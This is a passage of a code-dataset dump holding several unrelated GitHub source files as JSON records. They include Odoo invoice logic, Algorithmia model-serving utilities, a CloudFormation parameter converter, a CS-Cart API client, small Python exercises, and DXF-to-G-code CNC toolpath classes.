self.mapped('line_ids').filtered(lambda line: line.balcon_line_ids.is_downpayment)\n for line in line_ids:\n try:\n line.balcon_line_ids.tax_id = line.tax_ids\n if all(line.tax_ids.mapped('price_include')):\n line.balcon_line_ids.price_unit = line.price_unit\n else:\n #To keep positive amount on the sale order and to have the right price for the invoice\n #We need the - before our untaxed_amount_to_invoice\n line.balcon_line_ids.price_unit = -line.balcon_line_ids.untaxed_amount_to_invoice\n except UserError:\n # a UserError here means the SO was locked, which prevents changing the taxes\n # just ignore the error - this is a nice to have feature and should not be blocking\n pass\n return res\n\n def _post(self, soft=True):\n # 
OVERRIDE\n # Auto-reconcile the invoice with payments coming from transactions.\n # It's useful when you have a \"paid\" sale order (using a payment transaction) and you invoice it later.\n posted = super()._post(soft)\n\n for invoice in posted.filtered(lambda move: move.is_invoice()):\n payments = invoice.mapped('transaction_ids.payment_id')\n move_lines = payments.line_ids.filtered(lambda line: line.account_internal_type in ('receivable', 'payable') and not line.reconciled)\n for line in move_lines:\n invoice.js_assign_outstanding_line(line.id)\n return posted\n\n def action_invoice_paid(self):\n # OVERRIDE\n res = super(AccountMove, self).action_invoice_paid()\n todo = set()\n for invoice in self.filtered(lambda move: move.is_invoice()):\n for line in invoice.invoice_line_ids:\n for balcon_line in line.balcon_line_ids:\n todo.add((balcon_line.order_id, invoice.name))\n for (order, name) in todo:\n order.message_post(body=_(\"Invoice %s paid\", name))\n return res\n","repo_name":"huntergps/dpng","sub_path":"l10n_ec_balcon/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8182188263","text":"import os\nimport sys\nimport shutil\nimport getpass\nimport subprocess\n\nimport Algorithmia\nfrom Algorithmia.errors import AlgorithmException\n\nclient = Algorithmia.client()\nin_algorithmia = True if os.environ.get(\"ALGORITHMIA_API\", False) else False\n\n\nclass BaseAPI(object):\n def __init__(self):\n self._model = None\n\n def get_model(self):\n \"\"\"Singleton for the model\n \"\"\"\n if self._model is None:\n print(\"BaseAPI: Loading model\")\n self._model = self.load_model()\n print(\"BaseAPI: Model loaded\")\n return self._model\n\n model = property(get_model)\n\n def load_model(self):\n \"\"\"Subclasses must implement this method\n\n It should return an object that will be available as the .model property\n \"\"\"\n raise NotImplementedError\n\n def apply(self, input):\n if isinstance(input, dict):\n if \"ping\" in input.keys():\n return True\n elif \"debug\" in input.keys():\n return self.debug_info_all()\n elif \"health\" in input.keys():\n status = \"live\"\n if self._model:\n status = \"model_loaded\"\n return {\"status\": status}\n elif \"load\" in input.keys():\n self.get_model()\n return \"ok\"\n elif \"predict\" in input.keys():\n self.get_model()\n return self.predict(input[\"predict\"])\n else:\n raise AlgorithmException(\"Invalid input JSON format\")\n else:\n raise AlgorithmException(\"Input should be JSON\")\n\n def debug_info_all(self):\n data = {}\n data[\"env\"] = dict(os.environ)\n data[\"sys_prefix\"] = sys.prefix\n data[\"whoami\"] = getpass.getuser()\n data[\"in_algorithmia\"] = in_algorithmia\n data[\"which_python\"] = shutil.which(\"python\")\n data[\"pip_freeze\"] = subprocess.check_output([\"pip\", \"freeze\"]).decode(\"utf-8\")\n\n data.update(self.debug_info())\n return data\n\n def debug_info(self):\n return {}\n\n def predict(self, input):\n raise NotImplementedError\n\n\ndef extract_tar_gz(file, output_dir=\"./models\"):\n \"\"\"\n Extract a .tar.gz\n\n Parameters\n ----------\n output_dir (default=\"./models\"): Where to extract the .tar.gz\n\n Returns\n ------\n output_dir: full path to the output directory where files where extracted\n \"\"\"\n os.makedirs(output_dir, exist_ok=True)\n\n try:\n output = subprocess.check_output(\n \"tar -C {output} -xzf {targz}\".format(output=output_dir, targz=file),\n 
stderr=subprocess.STDOUT,\n            shell=True,\n        ).decode()\n    except subprocess.CalledProcessError as ex:\n        output = ex.output.decode()\n        raise Exception(\"Could not extract file: %s\" % output)\n\n    return os.path.realpath(os.path.join(output_dir))\n\n\ndef get_file(remote_fpath):\n    \"\"\"\n    Download a file hosted on Algorithmia Hosted Data\n\n    If the file ends with .tar.gz it will untar the file.\n    It's recommended that the tar file contain a single file compressed like:\n    tar -czvf model.format.tar.gz model.format\n\n    Returns the local file path of the downloaded file\n    \"\"\"\n    basename = os.path.basename(remote_fpath)\n\n    if remote_fpath.startswith(\"data://\"):\n        # Download from Algorithmia hosted data\n        local_fpath = client.file(remote_fpath).getFile().name\n\n        if basename.endswith(\".tar.gz\"):\n            output_dir = extract_tar_gz(local_fpath)\n            no_ext = basename[: -len(\".tar.gz\")]\n            local_fpath = os.path.join(output_dir, no_ext)\n\n        return local_fpath\n\n    return remote_fpath\n\n\ndef exists(username, collection, fname=None, connector=\"data\"):\n    if fname is None:\n        path = f\"{connector}://{username}/{collection}\"\n        obj = client.dir(path)\n        return obj.exists()\n    else:\n        path = f\"{connector}://{username}/{collection}/{fname}\"\n        obj = client.file(path)\n        return obj.exists()\n\n\ndef upload_file(\n    local_filename, username, collection, fname, connector=\"data\",\n):\n    dir_exists = exists(username=username, collection=collection, connector=connector)\n    if dir_exists is False:\n        dir_path = f\"{connector}://{username}/{collection}/\"\n        new_dir = client.dir(dir_path)\n        new_dir.create()\n\n    remote_file = f\"{connector}://{username}/{collection}/{fname}\"\n    client.file(remote_file).putFile(local_filename)\n    return remote_file\n\n\nif __name__ == \"__main__\":\n    print(extract_tar_gz(\"./models/demucs_extra.th.tar.gz\"))\n","repo_name":"VamuveTV/demucs-app","sub_path":"src/algorithmia_utils.py","file_name":"algorithmia_utils.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19969620494","text":"\"\"\" Converts CloudFormation parameters to the native format expected by the CLI.\n\nCode Pipeline expects this format:\nhttps://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/continuous-delivery-codepipeline-cfn-artifacts.html#w2ab2c13c15c13\n\nCloudFormation expects this format:\nhttps://aws.amazon.com/blogs/devops/passing-parameters-to-cloudformation-stacks-with-the-aws-cli-and-powershell/\n\nUSAGE:\n    python parameters_generator.py template.json > temp.json\n\n    Use the temp.json file as a parameter file in a cloudformation CLI call:\n    aws cloudformation create-stack --stack-name <stack-name> --template-body file://template.json --parameters file://temp.json\n\"\"\"\n\n__author__ = \"Jason DeBolt (jasondebolt@gmail.com)\"\n\nimport sys, os, json\n\ndef convert_parameters_file(obj):\n    params = obj['Parameters']\n    new_obj = []\n\n    for param_key in params:\n        new_obj.append(\n            {'ParameterKey': param_key, 'ParameterValue': params[param_key]})\n    return json.dumps(new_obj, indent=4)\n\ndef _parse_json(path):\n    result = open(os.path.join(sys.path[0], path), 'rb').read()\n    try:\n        return json.loads(result)\n    except json.decoder.JSONDecodeError as e:\n        print('\\nYour JSON is not valid! 
Did you check trailing commas??\\n')\n raise(e)\n\ndef main(args):\n params_file = args[0]\n json_result = _parse_json(params_file)\n print(convert_parameters_file(json_result))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"jasondebolt/phoenix-docker","sub_path":"parameters_generator.py","file_name":"parameters_generator.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5853584481","text":"from enum import Enum\n\nfrom cscartapi.sender_requests import SenderRequests\n\n\nclass CscartAPIException(Exception):\n def __init__(self, status_code, message):\n super().__init__(self)\n self.status_code = status_code\n self.message = message\n\n def __str__(self):\n return \"[%s] %s\" % (str(self.status_code), str(self.message))\n\n\nclass CscartAPI:\n def __init__(self, base_url, username, api_key, api_version='1.0'):\n self.base_url = base_url\n if self.base_url.endswith('/') is False: # ensure self.base_url end with /\n self.base_url += '/'\n self.version = '' if api_version == '1.0' else api_version\n self.username = username\n self.api_key = api_key\n\n self.sender = SenderRequests(self.username, self.api_key)\n\n self.reset()\n\n def reset(self):\n self.method = None\n self.entity = None\n self.params = dict()\n self.data = dict()\n self.id = None\n\n def set_entity(self, entity: str):\n self.entity = entity\n\n def set_id(self, id: str):\n self.id = id\n\n def update_params(self, params: dict):\n # merge two dicts\n self.params.update(params)\n\n def update_data(self, data: dict):\n self.data.update(data)\n\n def get_url(self) -> str:\n # get base url\n url = self.base_url\n\n # get version of api\n url += 'api/' + self.version\n if not url.endswith('/'):\n url += '/'\n\n # get entity (entity must not None)\n if self.entity is None:\n raise ValueError('Entity must not be None!')\n url += self.entity + '/'\n\n # get id (if it has)\n if self.id:\n url += self.id\n\n # get params (if it has)\n if len(self.params) > 0:\n url += '?' 
+ '&'.join(['='.join([k, v]) for k, v in self.params.items()])\n\n # return url\n return url\n\n def commit(self):\n # get url\n url = self.get_url()\n\n # get method\n method = self.method\n\n response = None\n # call sender to send request\n if method == 'GET':\n response = self.sender.get(url)\n elif method == 'POST':\n response = self.sender.post(url, self.data)\n elif method == 'PUT':\n response = self.sender.put(url, self.data)\n elif method == 'DELETE':\n response = self.sender.delete(url)\n else:\n raise TypeError(method + \" not in sender.Method list.\") # 访问方法超出API允许范围\n\n # get response (raise exception when error)\n if 'message' in response.keys(): # error accourd\n raise CscartAPIException(response['status'], response['message'])\n\n # TODO logging\n\n # reset api\n self.reset()\n\n # return response\n return response\n\n def get(self, entity: str, id: str | None = None):\n self.method = 'GET' \n self.sets(entity=entity, id=id)\n return self\n\n def create(self, entity: str, data: dict):\n self.method = 'POST' \n self.sets(entity=entity, data=data)\n return self\n\n def delete(self, entity: str, id: str):\n self.method = 'DELETE' \n self.sets(entity=entity, id=id)\n return self\n\n def update(self, entity: str, id: str, data: dict):\n self.method = 'PUT' \n self.sets(entity=entity, id=id, data=data)\n return self\n\n def sets(self, entity: str, id: str | None = None, data: dict | None = None):\n self.set_entity(entity)\n self.set_id(id)\n if data is not None:\n self.update_data(data)\n\n def order_by(self, key: str, sort_order: Enum('asc', 'desc') = 'desc'):\n self.update_params({\n 'sort_by': key,\n 'sort_order': str(sort_order),\n })\n return self\n\n def page(self, page: int, items_per_page: int | None = None):\n self.update_params({'page': str(page)})\n if items_per_page is not None:\n self.update_params({'items_per_page': str(items_per_page)})\n return self\n\n def filter(self, key: str, value: str):\n self.update_params({\n key: value,\n })\n return self\n","repo_name":"richard-ma/cscartapi","sub_path":"cscartapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39591510675","text":"import lab_odev1\n\nprint('\\nMETHODLAR LİSTESİ')\nprint('\\n1. REGULA FALSİ')\nprint('\\n2. NEWTON RAPHSON')\nprint('\\n3. 
SECANT')\n\nchoice = input('Yapmak istediğiniz işlemi giriniz:')\nchoice = int(choice)\n\nif choice == 1:\n xl = input('İlk Tahmin: ')\n xh = input('İkinci Tahmin:')\n max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n xl = float(xl)\n xh = float(xh)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_regula_falsi(xl, xh, max_hata, max_iter))\n\nelif choice == 2:\n x0 = input('Tahmin: ')\n max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n x0 = float(x0)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_newton(x0, max_hata, max_iter))\n\nelif choice == 3:\n xl = input('İlk Tahmin: ')\n xh = input('İkinci Tahmin:')\n max_hata = input('Maksimum Hata:')\n max_iter = input('Maksimum iterasyon sayısı')\n\n xl = float(xl)\n xh = float(xh)\n max_hata = float(max_hata)\n max_iter = int(max_iter)\n\n print(lab_odev1.my_secant(xl, xh, max_hata, max_iter))\n\nelse:\n print(\"Hatalı işlem numarası girdiniz!\")","repo_name":"mithatcanbursali/numericalanalysishomework","sub_path":"lab_odev1_test.py","file_name":"lab_odev1_test.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14575102389","text":"import numpy as np\nimport theano\nimport nnb\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n return False\n\ndef is_year(s):\n return s.isdigit() and 1800 <= int(s) <= 2030\n\nclass WordVecsHelper:\n def __init__(self, lower=True):\n self.word_vecs = None\n self.word2index = None\n self.counter = {}\n self.lower = lower\n\n def add_sentences(self, sentences):\n for sentence in sentences:\n for word in sentence:\n token = word\n if self.lower:\n token = word.lower()\n if is_year(token) or is_number(token):\n continue\n if token not in self.counter:\n self.counter[token] = 0\n self.counter[token] += 1\n\n def create(self, dim, threshold=0):\n word2index = {}\n word2index['NUMBER'] = 0\n word2index['YEAR'] = 1\n word2index['UNK'] = 2\n num_words = 3\n\n for token in self.counter:\n if self.counter[token] <= threshold:\n continue\n if is_year(token):\n token = 'YEAR'\n elif is_number(token):\n token = 'NUMBER'\n\n if token not in word2index:\n word2index[token] = num_words\n num_words += 1\n\n\n word_vecs = nnb.rng.normal(\n loc=0,\n scale=1.0,\n size=(num_words, dim)\n )\n self.word_vecs = word_vecs/10\n self.word2index = word2index\n return word_vecs,word2index\n\n def translate_word(self, s):\n if self.lower:\n s = s.lower()\n\n if is_year(s):\n s = 'YEAR'\n elif is_number(s):\n s = 'NUMBER'\n if s not in self.word2index:\n s = 'UNK'\n\n return self.word2index[s]\n \n def translate(self, l):\n if isinstance(l, str):\n return self.translate_word(l)\n\n r = []\n for s in l:\n r.append(self.translate_word(s))\n\n return r\n\n def read_file(self, filename, separator='\\t'):\n line_counts = 1\n word_dim = None\n with open(filename) as fin:\n line = fin.readline()\n splits = line.split(separator)\n word_dim = len(splits) - 1\n for line in fin:\n line_counts += 1\n\n\n #UNK\n line_counts += 1\n word_vecs = np.empty(\n shape=(line_counts, word_dim),\n dtype=theano.config.floatX\n )\n word_vecs[0, :] = nnb.rng.normal(loc=0., scale=1., size=(1, word_dim)) / 10\n\n word2index = {}\n word2index['UNK'] = 0\n with open(filename) as fin:\n for line in fin:\n splits = line.split(separator)\n token = splits[0]\n vec = map(float, splits[1:])\n 
word_vecs[len(word2index), :] = vec\n word2index[token] = len(word2index)\n\n self.word2index = word2index\n self.word_vecs = word_vecs\n\n return word_vecs, word2index\n","repo_name":"NNBlocks/NNBlocks","sub_path":"nnb/utils/word_vecs.py","file_name":"word_vecs.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"26216639781","text":"# https://leetcode.com/problems/largest-submatrix-with-rearrangements/\n# requires a bit thinking\n\nclass Solution:\n def largestSubmatrix(self, matrix: List[List[int]]) -> int:\n a = matrix\n n, m = len(a), len(a[0])\n\n for j in range(m):\n cur = 0\n for i in range(n):\n if a[i][j] == 1:\n a[i][j] += cur\n else:\n a[i][j] = 0\n cur = a[i][j]\n\n res = 0\n for i in range(n):\n a[i].sort()\n for j in range(m):\n res = max(res, (m - j) * a[i][j])\n\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1501-2000/1727_largest-submatrix-with-rearrangements_1_AC.py","file_name":"1727_largest-submatrix-with-rearrangements_1_AC.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"38136513884","text":"class Plant():\n def __init__(self):\n self._class='parent of all plants'\n self._name='no name'\n self._akar=None\n self._batang=None\n self._daun=None\n self._identity=''\n\n def constructIdentity(self):\n self._identity='Hi, I\\'m '+self._class+'. My name is '+self._name\n return self._identity\n\n def showIdentity(self):\n print(self.constructIdentity())\n\nclass Monocotyle(Plant):\n def __init__(self):\n super().__init__()\n self._class='Monocotyle'\n self._akar='serabut'\n self._batang='no cambium'\n self._daun='tidak menyirip'\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._akar+' root, '+self._batang+' stem, and '+self._daun+' leaf'\n return self._identity\n\nclass Dicotyle(Plant):\n def __init__(self):\n super().__init__()\n self._class='Dicotyle'\n self._akar='tunggang'\n self._batang='cambium'\n self._daun='menyirip'\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._akar+' root, '+self._batang+' stem, and '+self._daun+' leaf'\n return self._identity\n\nclass Vegetative(Monocotyle):\n def __init__(self,name):\n super().__init__()\n self._class='Vegetative'\n self._reproduction='spora'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I reproduce with '+self._reproduction\n return self._identity\n\nclass Generative(Monocotyle):\n def __init__(self, name):\n super().__init__()\n self._class='Generative'\n self._reproduction='flower'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I reproduce with '+self._reproduction\n return self._identity\n\nclass FlowerPlant(Dicotyle):\n def __init__(self,name):\n super().__init__()\n self._class='Flower Plant'\n self._accessories='flower'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. I have '+self._accessories+' as my accessories'\n return self._identity\n\nclass FruitPlant(Dicotyle):\n def __init__(self, name):\n super().__init__()\n self._class='Fruit Plant'\n self._accessories='fruit'\n self._name=name\n\n def constructIdentity(self):\n self._identity=super().constructIdentity()+'. 
I have '+self._accessories+' as my accessories'\n return self._identity\n\nlumut=Vegetative('lumut')\ncemara=Generative('cemara')\nmawar=FlowerPlant('mawar')\nmangga=FruitPlant('mangga')\n\nlumut.showIdentity()\ncemara.showIdentity()\nmawar.showIdentity()\nmangga.showIdentity()","repo_name":"SyamsulAlterra/Alta","sub_path":"OOP/Inheritance-Polymorphism/3-tumbuhan.py","file_name":"3-tumbuhan.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27822701501","text":"def patternCount(sequence, pattern):\r\n sequence_size = len(sequence)\r\n pattern_size = len(pattern)\r\n count = 0\r\n for i in range(0,sequence_size-pattern_size+1):\r\n if sequence[i:i+pattern_size] == pattern:\r\n count+=1\r\n return count\r\n \r\n#start main\r\ngenome_file = open(\"pattern_count.txt\", \"r\")\r\n\r\nsequence = genome_file.readline()\r\npattern = genome_file.readline()\r\n\r\n\r\nprint(patternCount(sequence, pattern))\r\n\r\ngenome_file.close()\r\n","repo_name":"Bailey455/Bioinformatics","sub_path":"pattern_count.py","file_name":"pattern_count.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42620496494","text":"# Task 5\n# Write a program to reverse a string\nimport pytest\n\n\ndef reverse_string(message):\n if not message:\n raise Exception(\"String cannot be empty\")\n if not message.isascii():\n raise Exception(\"String cannot be digits or other special characters\")\n tmp = message.split(\" \")\n return \" \".join(tmp[::-1])\n\n\ndef test_reverse_string():\n input_string = \"How are you?\"\n expected_value = \"you? are How\"\n assert reverse_string(input_string) == expected_value\n\n\ndef test_reverse_string_empty():\n input_string = \"\"\n with pytest.raises(Exception):\n reverse_string(input_string)\n\n\ndef test_reverse_string_with_bool():\n message = True\n with pytest.raises(Exception):\n reverse_string(message)\n","repo_name":"xurten/python-and-csharp-coding-interview-tasks","sub_path":"python_tests/test_5_reverse_string.py","file_name":"test_5_reverse_string.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11116558623","text":"from __future__ import print_function\nimport math\nimport gcode_cmd\nimport cnc_drill\nimport cnc_pocket\nimport cnc_boundary\nimport dxfgrabber\nimport networkx\nimport numpy\nimport shapely.geometry.polygon as polygon\nimport matplotlib.pyplot as plt\n\nfrom geom_utils import dist2D\nfrom graph_utils import getEntityGraph\nfrom dxf_utils import getEntityStartAndEndPts\n\nclass DxfBase(gcode_cmd.GCodeProg):\n\n ALLOWED_TYPE_LIST = None\n DEFAULT_PARAM = {'dxfTypes': []}\n\n def __init__(self,param):\n self.param = dict(self.DEFAULT_PARAM)\n self.param.update(param)\n try:\n self.dwg = self.param['dwg']\n except KeyError:\n self.dwg = dxfgrabber.readfile(self.param['fileName'])\n self.makeListOfCmds()\n\n @property\n def layerNameList(self):\n try:\n layerNameList = self.param['layers']\n except KeyError:\n layerNameList = [layer.name for layer in self.dwg.layers]\n return layerNameList\n\n @property\n def entityList(self):\n entityList = [x for x in self.dwg.entities if x.layer in self.layerNameList]\n entityList = [x for x in entityList if x.dxftype in self.param['dxfTypes']] \n entityList = [x for x in entityList if x.dxftype in self.ALLOWED_TYPE_LIST]\n return 
entityList\n\n\nclass DxfDrill(DxfBase):\n\n ALLOWED_TYPE_LIST = ['POINT', 'CIRCLE', 'ARC']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['CIRCLE'],\n 'startCond' : 'minX',\n }\n\n def __init__(self,param):\n super(DxfDrill,self).__init__(param)\n\n @property\n def drillClass(self):\n if 'stepZ' in self.param:\n drill = cnc_drill.PeckDrill\n else:\n drill = cnc_drill.SimpleDrill\n return drill \n\n def getCenterPt(self,entity):\n if entity.dxftype == 'POINT':\n centerPt = entity.point\n else:\n centerPt = entity.center \n return centerPt\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n # ------------------------------------------------------------------------\n # Note: for better efficiency it might be worth while sorting the entities\n # based on some criteria .....distance, etc.\n # -------------------------------------------------------------------------\n for entity in self.entityList:\n drillParam = dict(self.param)\n centerPt = self.getCenterPt(entity)\n drillParam['centerX'] = centerPt[0]\n drillParam['centerY'] = centerPt[1]\n drill = self.drillClass(drillParam)\n self.listOfCmds.extend(drill.listOfCmds)\n\n\nclass DxfCircPocket(DxfBase):\n\n ALLOWED_TYPE_LIST = ['CIRCLE']\n DEFAULT_PARAM = {'dxfTypes': ['CIRCLE']}\n\n def __init__(self,param):\n super(DxfCircPocket,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n for entity in self.entityList:\n pocketParam = dict(self.param)\n pocketParam['centerX'] = entity.center[0]\n pocketParam['centerY'] = entity.center[1]\n pocketParam['radius'] = entity.radius\n if 'thickness' in pocketParam:\n pocket = cnc_pocket.CircAnnulusPocketXY(pocketParam)\n else:\n pocket = cnc_pocket.CircPocketXY(pocketParam)\n self.listOfCmds.extend(pocket.listOfCmds)\n\n\nclass DxfRectPocketFromExtent(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','POINT']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','POINT'],\n 'ptEquivTol' : 1.0e-5,\n 'components' : True,\n }\n\n def __init__(self,param):\n super(DxfRectPocketFromExtent,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n if self.param['components']:\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in enumerate(connectedCompSubGraphs):\n entityList = [subGraph[n][m]['entity'] for n, m in subGraph.edges()]\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(entityList))\n else:\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(self.entityList))\n\n def makeListOfCmdsForEntityList(self,entityList):\n \"\"\"\n Generates rectangular pocket from extent of entities in the given list.\n \"\"\"\n coordList = []\n for entity in entityList:\n if entity.dxftype == 'LINE':\n coordList.append(entity.start[:2])\n coordList.append(entity.end[:2])\n elif entity.dxftype == 'POINT':\n coordList.append(entity.point[:2])\n else:\n raise RuntimeError('dxftype {0} not supported yet'.format(entity.dxftype))\n\n # Get x and y coordinates max and min values\n xCoordList = [p[0] for p in coordList]\n yCoordList = [p[1] for p in coordList]\n xMax = max(xCoordList)\n xMin = min(xCoordList)\n yMax = max(yCoordList)\n yMin = min(yCoordList)\n\n # Calculate center, width and height\n centerX = 0.5*(xMax + xMin)\n centerY = 0.5*(yMax + yMin)\n width = xMax - xMin\n height = yMax - yMin\n\n # Create list of commands\n pocketParam = 
dict(self.param)\n pocketParam['centerX'] = centerX\n pocketParam['centerY'] = centerY\n pocketParam['width'] = width\n pocketParam['height'] = height\n if 'thickness' in pocketParam:\n pocket = cnc_pocket.RectAnnulusPocketXY(pocketParam)\n else:\n pocket = cnc_pocket.RectPocketXY(pocketParam)\n return pocket.listOfCmds \n\n\nclass DxfRectBoundaryFromExtent(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','POINT']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','POINT'],\n 'ptEquivTol' : 1.0e-5,\n 'components' : True,\n }\n\n def __init__(self,param):\n super(DxfRectBoundaryFromExtent,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n if self.param['components']:\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in enumerate(connectedCompSubGraphs):\n entityList = [subGraph[n][m]['entity'] for n, m in subGraph.edges()]\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(entityList))\n else:\n self.listOfCmds.extend(self.makeListOfCmdsForEntityList(self.entityList))\n\n def makeListOfCmdsForEntityList(self,entityList):\n \"\"\"\n Generates rectangular pocket from extent of entities in the given list.\n \"\"\"\n coordList = []\n for entity in entityList:\n if entity.dxftype == 'LINE':\n coordList.append(entity.start[:2])\n coordList.append(entity.end[:2])\n elif entity.dxftype == 'POINT':\n coordList.append(entity.point[:2])\n else:\n raise RuntimeError('dxftype {0} not supported yet'.format(entity.dxftype))\n\n # Get x and y coordinates max and min values\n xCoordList = [p[0] for p in coordList]\n yCoordList = [p[1] for p in coordList]\n xMax = max(xCoordList)\n xMin = min(xCoordList)\n yMax = max(yCoordList)\n yMin = min(yCoordList)\n\n # Calculate center, width and height\n centerX = 0.5*(xMax + xMin)\n centerY = 0.5*(yMax + yMin)\n width = xMax - xMin\n height = yMax - yMin\n\n # Create list of commands\n boundaryParam = dict(self.param)\n boundaryParam['centerX'] = centerX\n boundaryParam['centerY'] = centerY\n boundaryParam['width'] = width\n boundaryParam['height'] = height\n boundary = cnc_boundary.RectBoundaryXY(boundaryParam)\n return boundary.listOfCmds \n\n\nclass DxfCircBoundary(DxfBase):\n\n ALLOWED_TYPE_LIST = ['CIRCLE']\n DEFAULT_PARAM = {'dxfTypes': ['CIRCLE']}\n\n def __init__(self,param):\n super(DxfCircBoundary,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n for entity in self.entityList:\n bndryParam = dict(self.param)\n bndryParam['centerX'] = entity.center[0]\n bndryParam['centerY'] = entity.center[1]\n bndryParam['radius'] = entity.radius\n bndry = cnc_boundary.CircBoundaryXY(bndryParam)\n self.listOfCmds.extend(bndry.listOfCmds)\n\n\nclass DxfBoundary(DxfBase):\n\n ALLOWED_TYPE_LIST = ['LINE','ARC']\n DEFAULT_PARAM = {\n 'dxfTypes' : ['LINE','ARC'],\n 'convertArcs' : True,\n 'ptEquivTol' : 1.0e-5,\n 'maxArcLen' : 1.0e-2,\n 'startCond' : 'minX',\n }\n\n def __init__(self,param):\n super(DxfBoundary,self).__init__(param)\n\n def makeListOfCmds(self):\n self.listOfCmds = []\n # Get entity graph and find connected components\n graph, ptToNodeDict = getEntityGraph(self.entityList,self.param['ptEquivTol'])\n connectedCompSubGraphs = networkx.connected_component_subgraphs(graph)\n # Create list of commands for each connected component individually\n for i, subGraph in 
enumerate(connectedCompSubGraphs):\n nodeDegreeList = [subGraph.degree(n) for n in subGraph]\n maxNodeDegree = max(nodeDegreeList)\n minNodeDegree = min(nodeDegreeList)\n if maxNodeDegree > 2:\n # Graph is complicated - treat each entity as separate task \n for edge in subGraph.edges():\n edgeGraph = subGraph.subgraph(edge)\n listOfCmds = self.makeCmdsForLineString(edgeGraph)\n self.listOfCmds.extend(listOfCmds)\n elif maxNodeDegree == 2 and minNodeDegree == 2:\n # Graph is closed loop\n listOfCmds = self.makeCmdsForClosedLoop(subGraph)\n self.listOfCmds.extend(listOfCmds)\n elif minNodeDegree == 1:\n # Graph is line string\n listOfCmds = self.makeCmdsForLineString(subGraph)\n self.listOfCmds.extend(listOfCmds)\n else:\n errorMsg = 'sub-graph has nodes with degree 0'\n raise RuntimeError(errorMsg)\n \n\n def makeCmdsForLineString(self,graph):\n if self.param['cutterComp'] is not None:\n errorMsg = 'cutterComp must be None for line string graphs'\n raise RuntimeError(errorMsg)\n\n # Get start and end node based on startCond.\n endNodeList = [n for n in graph if graph.degree(n) == 1]\n if self.param['startCond'] in ('minX', 'maxX'):\n endCoordAndNodeList = [(graph.node[n]['coord'][0],n) for n in endNodeList]\n elif self.param['startCond'] in ('minY', 'maxY'):\n endCoordAndNodeList = [(graph.node[n]['coord'][1],n) for n in endNodeList]\n else:\n raise ValueError('unknown startCond {0}'.format(self.param['startCond']))\n endCoordAndNodeList.sort()\n if 'min' in self.param['startCond']:\n startNode = endCoordAndNodeList[0][1]\n endNode = endCoordAndNodeList[1][1]\n else:\n startNode = endCoordAndNodeList[1][1]\n endNode = endCoordAndNodeList[0][1]\n\n # Get path from start to end node (there is only one)\n simplePathGen = networkx.all_simple_paths(graph, startNode,endNode)\n startToEndPath = next(simplePathGen)\n\n # Get list of segments (line or arc) along path and create cnc commands\n segList = self.getSegListFromPath(startToEndPath, graph)\n param = dict(self.param)\n param['closed'] = False \n listOfCmds = self.makeListOfCmdsFromSegList(segList,param)\n return listOfCmds\n\n def makeCmdsForClosedLoop(self,graph):\n # Get start and end nodes based on startCond\n if self.param['startCond'] in ('minX', 'maxX'):\n coordAndNodeList = 